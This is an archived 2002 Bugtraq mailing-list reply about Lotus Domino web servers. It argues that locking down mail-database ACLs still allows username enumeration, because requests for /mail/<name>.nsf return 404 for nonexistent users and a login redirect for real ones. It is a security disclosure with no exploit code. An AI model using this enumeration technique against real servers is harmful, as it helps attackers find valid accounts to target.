[24075] in bugtraq
Re: Script for find domino's users
daemon@ATHENA.MIT.EDU (nicob@nicob.net)
Sun Feb 3 22:30:31 2002
From: nicob@nicob.net
To: "Simon Delicata" <sdelicata@planer.co.uk>
Cc: bugtraq@securityfocus.com
Date: Fri, 01 Feb 2002 13:41:07 +0100
In-Reply-To: <OFB9B5851F.02EFA365-ON80256B52.006CBA40-80256B52.006E2D45@planer.co.uk>
Message-Id: <4ZDAYW82CAC7A9PKXVE9HONTSX4ZEC.3c5a8ce3@NICOLAS>
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
31/01/2002 21:03:10, "Simon Delicata" <sdelicata@planer.co.uk> wrote :
>Two things can be done to avoid this :
>
>1 - Change the ACL on sensitive databases ( /mail/* , names.nsf ) to :
> Anonymous - No access
> [Default] - No access
In my opinion, a Domino webserver configured with these ACLs still allows enumeration of
valid users.
If you try to GET a file named /mail/toto.nsf :
- toto doesn't exist => 404
- toto exists => redirection to the login page ("200 OK")
I'm not aware of any ACL configuration which forbid this behaviour.
Nicob
